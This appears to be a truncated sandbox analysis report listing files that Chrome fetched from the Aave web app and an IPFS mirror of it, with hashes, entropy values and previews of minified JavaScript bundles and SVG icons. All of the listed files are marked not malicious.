                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(r){let{detail:t=1,pop:e=1}=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},{PI:o,min:f,max:i,cos:u,round:a}=Math,c=r[0]|r[1]<<8|r[2]<<16,l=r[3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w>>1)]>>((1&w++)<<2)&15)/7.5-1)*n);return o},j=x(b,g,(c>>18&31)/31/2),k=x(3,3,(l>>3&63)/63*e),P=x(3,3,(l>>9&63)/63*e),_=v?x(5,5,O):[],A=(0,n.UN)(r),C=a(A>1?32:32*A),F=a(A>1?32/A:32),M=new Uint8Array(C*F*4),U=[],T=[];for(let r=0,e=0;r<F;r++)for(let n=0;n<C;n++,e+=4){let a=s,c=p,l=d,h=y;for(let r=0,t=i(b,v?5:3);r<t;r++)U[r]=u(o/C*(n+.5)*r);for(l
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29845), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29845
                                                                                                                                                                                                                                                  Entropy (8bit):5.546544997481404
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:zyPkWVecfO1uKmjehCsSFfrzOFekd175inho:aeT1iehCzOj7V
                                                                                                                                                                                                                                                  MD5:71AFA37372BCF5B4969D120D11EDA787
                                                                                                                                                                                                                                                  SHA1:48CD9B5E0845DD65B2A94F24457DD23705F95ABD
                                                                                                                                                                                                                                                  SHA-256:1252C8A202667C63CFBAB39C563C47BF4755185E82EAA585A8E4906368E34865
                                                                                                                                                                                                                                                  SHA-512:41BE0E66A98416B8EF9255008B91E7C9118431A89D6458C49F2323CFF5DE84448DD9D416A7620D76EB1DC0A600ADE9A3D2649C4BD948CEC437C6AAAF308B28FB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[501],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2368), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2368
                                                                                                                                                                                                                                                  Entropy (8bit):5.20965218861483
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Zrd4UcM05QGVAEIbXJZzE7Ip3HJUj7xzPvQ58yhC74KXuI3IJV1pTaArCscVGnxz:tdedyEgJusp3Hg7qmyhNKfyVGAHcV+
                                                                                                                                                                                                                                                  MD5:B30ED08ED3B10CBD2BC9111BDD486D7B
                                                                                                                                                                                                                                                  SHA1:B1C3EB8E04D3FC8DD1587538FF508A63697E9344
                                                                                                                                                                                                                                                  SHA-256:72441A2B0D819C80AA792034F8AAAF3E3EF431B8B17EDB37769109FE81013888
                                                                                                                                                                                                                                                  SHA-512:50F1008EFC7AF8E927BC1E90CC5CF58C2F293498690A5A238167B0D261C430C40D8F275443A6345A04762F8C8B2D232A132AEFD8246DF81576945365353C82FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__BUILD_MANIFEST=function(s,c,a,e,t,n,i,r,f,k,u,h,d,j,b){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[s,"static/chunks/3645-9203dd9404a3977e.js","static/chunks/4254-ac0dd33f5ae839d3.js","static/chunks/1573-73b9595d97d74de8.js",n,c,a,e,i,"static/chunks/7604-eabb8e5b8018f878.js",k,"static/chunks/pages/index-5c55ce06141b7657.js"],"/404":[s,c,"static/chunks/pages/404-a9ff97d7bb01fc2f.js"],"/500":[s,c,"static/chunks/pages/500-cd1f18444ed6a64c.js"],"/_error":["static/chunks/pages/_error-f7c9e698edebedd1.js"],"/faucet":[s,c,a,e,"static/chunks/pages/faucet-a346b6eab1b79032.js"],"/governance":[r,s,t,f,u,h,c,d,"static/chunks/pages/governance-0757370cd87e1b88.js"],"/governance/ipfs-preview":[r,s,t,f,j,b,c,"static/chunks/pages/governance/ipfs-preview-d4ba601042d90009.js"],"/governance/v3/proposal":[r,s,t,f,j,b,u,"static/chunks/457-5fe4350bf05020d1.js",c,d,"static/chunks/pages/governance/v3/proposal-9ec103a761ebafd5.js"],"/history":[s,"static/chunks/8265-203250b91b340fb9.j
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):203708
                                                                                                                                                                                                                                                  Entropy (8bit):3.826088104351986
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zPgKNNJN86P5X208vLO9GINgxZhrRd51AlKDNXyadBYcOwg2oe6SeKqKTiq7Iq35:LgK/T5m7jajNgnh2eXOXrhqx8rzniowx
                                                                                                                                                                                                                                                  MD5:37EC3238EE9D47F7F0BFADE3868709E3
                                                                                                                                                                                                                                                  SHA1:D215C949078205B0CD56AB51CB519AFFB98F3D13
                                                                                                                                                                                                                                                  SHA-256:222B4FF6D02318E891A67E42E635897578F703C87F958C4C1D64FDB45D5550C5
                                                                                                                                                                                                                                                  SHA-512:EF213F8EDDF6165ED892EA3B8C51DA649CB478D7F6EBE67C0E6B36265716F519347BA218F41749120D50DE2D473B35203A10117B4701F514D7F0673436C76F21
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M21.87-1.413H-2.167v16.826H21.87V-1.413Z" fill="#C60B1E"/><path d="M21.87 2.794H-2.167v8.413H21.87V2.793Z" fill="#FFC400"/><path d="M3.217 6.064s-.016 0-.025-.006a.38.38 0 0 1-.036-.034l-.022-.017-.02-.03s-.022-.04-.013-.071c.01-.03.029-.04.045-.05.016-.01.052-.021.052-.021s.028-.013.036-.013a.428.428 0 0 1 .041-.01s.01-.007.02-.011c.01-.004.022-.004.029-.006.006-.004.026-.007.035-.01l.052.003.052.004.07-.004c.013 0 .023-.004.036 0l.048.013.068.027c.016.007.058.013.074.021.02.01.029.023.039.038.01.013.01.027.012.037a.065.065 0 0 1 0 .038c-.004.01-.016.027-.016.027l-.02.034-.026.02s-.02.017-.032.017-.16-.03-.257-.03a1.179 1.179 0 0 0-.242.034Z" fill="#AD1519"/><path d="M3.72 6.072c-.003 0-.003 0 0 0-.005 0-.012-.004-.025-.004-.048-.007-.157-.028-.23-.028-.091 0-.232.028-.244.03-.004 0-.02 0-.026-.006a.29.29 0 0 1-.038-.034l-.023-.017-.02-.03c0-.004-.025-.044-.012-.074.013-.033.032-.044.048-.054a.266.266 0 0
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10134), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                                                                                                  Entropy (8bit):5.3248676773482275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w7g8F82kZbk9/obvQw++1R5j3FvtWU/98iqcjJLmLLx5pOsYU3hJo:w7GbbkxyzLR3FvN/6ojJGbYsL4
                                                                                                                                                                                                                                                  MD5:294B8F234E5006980C29F7309DF45D75
                                                                                                                                                                                                                                                  SHA1:FE4B0BE3402F3F26499D388F52F9FBD041D18D06
                                                                                                                                                                                                                                                  SHA-256:BA9F3DFF2E49BAF1CB2BAEB27C495A08630C569B3B0C1BD71DAE366574C2E37C
                                                                                                                                                                                                                                                  SHA-512:B071E5FC210E35015E3C86AA10FD547C2797425F0C0B54E7810CE934C9F14A7A0820E4E8EFA5BBFCA5C77B6B0CF0DE664DA3852C7FC623E5FD80B202BE9577FD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/82-c4138125c2feb6d3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[82],{833:function(e,t,r){r.r(t),r.d(t,{BigNumber:function(){return n.O$},formatFixed:function(){return o.S5},FixedFormat:function(){return o.xO},FixedNumber:function(){return o.xs},parseFixed:function(){return o.Ox},_base16To36:function(){return n.t2},_base36To16:function(){return n.g$}});var n=r(2593),o=r(20335)},78435:function(e,t,r){r.r(t),r.d(t,{logger:function(){return n.k},Wordlist:function(){return n.D},wordlists:function(){return o.E}});var n=r(48812),o=r(10234)},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function f(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const m=["baseClassName","className","color","component","fontSiz
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):130002
                                                                                                                                                                                                                                                  Entropy (8bit):5.26274534357211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:M3hOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:M3hOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                                                                                                                  MD5:8CEAC1A0789024027E37CCA07BEBAAD2
                                                                                                                                                                                                                                                  SHA1:6A80812D9E27ECC9B58466D027409F8A0668E2F4
                                                                                                                                                                                                                                                  SHA-256:745834316128A9605DB352A4146DFB81CFD209FA037D3256277E2BC9D12B0F44
                                                                                                                                                                                                                                                  SHA-512:A99D9DCA1C31AF0C2FE4E8B178B79B13DFA9F2A49D4776F1A9C4D008A6ACD4CD1C8AFF1B8D04D37AF9331E15F786D6A43186C45D2CD6FB3C626F92E1E597138B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):449
                                                                                                                                                                                                                                                  Entropy (8bit):5.193136170719881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnr0Qol8GcAumc4slZ8CirSgPAYlO9fPcpZGKYSQkGdQqncdnGXmuQoQqiK8AcAL:tr0dmGtuBcPRlgfPaGHsdGXNdQQ88L
                                                                                                                                                                                                                                                  MD5:1F4B4F940ACA49012D8D6D27EC05EEB7
                                                                                                                                                                                                                                                  SHA1:08207179BCAFD60964874A09B6428C8915AEB76D
                                                                                                                                                                                                                                                  SHA-256:E0C660872D4FF92F71591408DB5BE729E4E863907CE6906BE0A794A83660FEC8
                                                                                                                                                                                                                                                  SHA-512:EAADD8B66226DEA34055C924E5F3E3E7EFC7CF61030690807138AD46C200E2E2BD63EB6AFE08ED78431B8DF3BC68853E95AD409B5397D9610A9CFF02C68B72B1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/flags/el.svg
                                                                                                                                                                                                                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.627Zm0-6.5H7.777V4.623H21V6.25Z" fill="#fff"/></g><defs><clipPath id="a"><rect y="3" width="20" height="14" rx="2" fill="#fff"/></clipPath></defs></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):688
                                                                                                                                                                                                                                                  Entropy (8bit):4.422809447424027
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                                                                                                                                                                                                  MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                                                                                                                                                                                                  SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                                                                                                                                                                                                  SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                                                                                                                                                                                                  SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/9017b7062734e72bb476.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17588), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17588
                                                                                                                                                                                                                                                  Entropy (8bit):5.441979320405256
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:V1pURffa6XWfdQ3eiOt2JN3Ddj80Ka1d5/Y5/t5/U:Pyhfa6X73dOt2JrJYJtJU
                                                                                                                                                                                                                                                  MD5:05FCF3CD38749A8662530D5665AEABCD
                                                                                                                                                                                                                                                  SHA1:A4E376EE6AE45F8D6533D2B0125AD9123429453D
                                                                                                                                                                                                                                                  SHA-256:952DEA1DC1EDDA61B66F787C0B1A2D29F11B225EB1833B71E61CC5AF5EFCCFB9
                                                                                                                                                                                                                                                  SHA-512:E08B855744AE43084B68759FBA0EFE3E9DE6F14C67FDE2BD5986DC0008B0DC6CB7A3A46960A2B966640CF049F4F848F6C9DCA2716A1774AB880163A16523FCB3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1226.2b4574c57c2b36b6.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1226],{1252:function(e,t,r){r.d(t,{O:function(){return a}});var n=r(49501),s=r(85893),a=function(){return(0,s.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing support, it is not possible to perform a collateral switch where stETH is the source token."})}},17211:function(e,t,r){r.r(t),r.d(t,{SwapModal:function(){return le}});var n=r(59499),s=r(49501),a=r(67294),o=r(31959),i=r(47130),l=r(8195),u=r(94635),c=r(67484),d=r(30120),p=r(81645),m=r(29630),f=r(9144),x=r(70794),h=r(25935),v=r(41024),y=r(72667),g=r(69331),b=r(53601),w=r(57824),j=r(1252),A=r(29946),S=r(74119),O=r(30313),T=r(43629),D=r(46930),C=r(77537),E=r(20301),k=r(94847),P=r(69125),L=r(68448),I=r(87385),R=r(73965),Z=r(93608),B=r(94671),F=r(99730),N=r(50029),_=r(17674),U=r(4730),M=r(87794),W=r.n(M),H=r(75331),Y=r(80854),V=r(21732),z=r(78371),q=r(67489),G=r(85893),K=["amountToSwap","amountToReceive","isWrongNetwork","sx","poolReserve","targetR
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (49123), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):49123
                                                                                                                                                                                                                                                  Entropy (8bit):5.390512090972617
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:emSNQ8tGvds5byT8sF6y/mgw/yNt+T8D6xvQmALj5:emAQ8QG5bY/mgwvTie4b5
                                                                                                                                                                                                                                                  MD5:B8C7A66D6C19776C17B5D93586C539D4
                                                                                                                                                                                                                                                  SHA1:0E63BA06AF5BC6EBB0433BEDDB9A2B0C89F14ADC
                                                                                                                                                                                                                                                  SHA-256:B539932318B22738F86B53EF9BF7BB3BB891EF8140D58936A36518814FDAEFAC
                                                                                                                                                                                                                                                  SHA-512:EFFAB9A44365AA1E757DCA1A9695C947BAAE97CEC3522B477E8B2275C24CFA086E977E3CE86C89109B496E135695AC74E3AAB157536555DC706F3A88B81F2818
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/v3-migration-cb3960f54b93b1d0.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4562],{40342:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return nt}});var n=r(59499),i=r(49501),s=r(30120),a=r(5152),o=r(11163),l=r(67294),c=r(45745),d=r(15446),u=r(25563),x=r(15070),h=r(75331),v=r(80854),p=r(1279),m=r(59148),b=r(27484),j=r.n(b),g=r(42568),f=r.n(g),y=r(83601),w=r(78371),Z=r(67728),C=r(25957),k=r(63263),S=r(52369),A=r(37197),I=r(45104),O=f()((function(e,t,r){return{reserves:e.reservesData,reservesIncentives:r,baseCurrencyData:e.baseCurrencyData,userEmodeCategoryId:t.userEmodeCategoryId,userReserves:t.userReserves}})),D=function(e){var t=(0,S.J)(e),r=(0,I.T)(e),n=(0,A.O)(e);return(0,C.W)([t,r,n],O)},B=r(49258);function M(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function P(e){for(var t=1;t<arguments.length;t++){var r=null!=argument
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):3822
                                                                                                                                                                                                                                                  Entropy (8bit):4.757556018267729
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:T0LsZkU7aWjMjPQdmyFCUbin6Cdq+WPUqWWuuXe0xIA/zAH9EwJH9EwTw:ssZkUsLByFCUenxkDUcXe0xIA/zAfa
                                                                                                                                                                                                                                                  MD5:256D5A202BC91FE137E22BFD4247E5B6
                                                                                                                                                                                                                                                  SHA1:EE972371F540E36D35F7874AC9328D09019745F2
                                                                                                                                                                                                                                                  SHA-256:7EBD23435F1E5EC4330A3951E7B9A34D8C60E959EEC9E98B2F1C989E1AC92646
                                                                                                                                                                                                                                                  SHA-512:E77F5E1184CCAD104ADEC314E57F9FBE03B940542A82F9783FDB571B185238D9D64182C06BF1BE1604E6E85CE5792483C8E90C75F168BFD21F394EEC1FA0E21A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/tokens/stkbptv2.svg
                                                                                                                                                                                                                                                  Preview:<svg width="36" height="36" viewBox="0 0 36 36" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M18 36c9.941 0 18-8.059 18-18S27.941 0 18 0 0 8.059 0 18s8.059 18 18 18Z" fill="#fff"/><path d="M17.973 36V10.06c-2.178-.008-3.937-.6-3.937-1.33 0-.542.974-1.01 2.37-1.216a8.16 8.16 0 0 0 1.608.153 8.205 8.205 0 0 0 1.573-.145l.036-.008c1.396.207 2.37.674 2.37 1.216 0 .723-1.728 1.312-3.88 1.33V36h-.14ZM14.83 6.337c0-.47.912-.869 2.176-1.01a6.479 6.479 0 0 0 1.981.006l.033-.006c1.264.141 2.176.54 2.176 1.01 0 .587-1.425 1.063-3.183 1.063-1.758 0-3.183-.476-3.183-1.063Zm.796-1.941c0-.44 1.068-.797 2.387-.797 1.318 0 2.387.357 2.387.797 0 .44-1.07.798-2.387.798-1.319 0-2.387-.358-2.387-.798Zm2.345-.872V.01h.141v3.514h-.14Z" fill="#000"/><path d="M17.995 36a17.898 17.898 0 0 1-10.061-3.073 18.048 18.048 0 0 1-6.52-7.917 17.905 17.905 0 0 1-1.048-3.378 18.17 18.17 0 0 1 0-7.254 17.897 17.897 0 0 1 2.707-6.434 18.048 18.048 0 0 1 7.918-6.52A17
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):130002
                                                                                                                                                                                                                                                  Entropy (8bit):5.26274534357211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:M3hOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:M3hOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                                                                                                                  MD5:8CEAC1A0789024027E37CCA07BEBAAD2
                                                                                                                                                                                                                                                  SHA1:6A80812D9E27ECC9B58466D027409F8A0668E2F4
                                                                                                                                                                                                                                                  SHA-256:745834316128A9605DB352A4146DFB81CFD209FA037D3256277E2BC9D12B0F44
                                                                                                                                                                                                                                                  SHA-512:A99D9DCA1C31AF0C2FE4E8B178B79B13DFA9F2A49D4776F1A9C4D008A6ACD4CD1C8AFF1B8D04D37AF9331E15F786D6A43186C45D2CD6FB3C626F92E1E597138B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/framework-79bce4a3a540b080.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11144), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11144
                                                                                                                                                                                                                                                  Entropy (8bit):5.459163683582332
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w0yPmy/Qn+aK/K20ove4TvGerF7jC/LkXg8FY/42QKI6f8b0tEbnU8pnL/jwogTt:vyPmy/Qn+3/Zpve4TvP1jEkXG/QHYWf4
                                                                                                                                                                                                                                                  MD5:B2CDA9B304B1CD4AA899F1774A4137D2
                                                                                                                                                                                                                                                  SHA1:572F9DC2234762E51A76A941A7DB1B07785D5D74
                                                                                                                                                                                                                                                  SHA-256:43D43EC5CFA4092A88CA2A78E56A0D6E8020315A5693F03BB9746635EE9F1FAA
                                                                                                                                                                                                                                                  SHA-512:B14FDDA0FC2234C18DF97BB31724C92CF34BAB63BAD846CB584399D9E1CBAD5062D79386FA353CCDE471703A7E2F6D31F833BEA1C40D545F543CE121CC6D4522
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9410.9b52440c93125af8.js
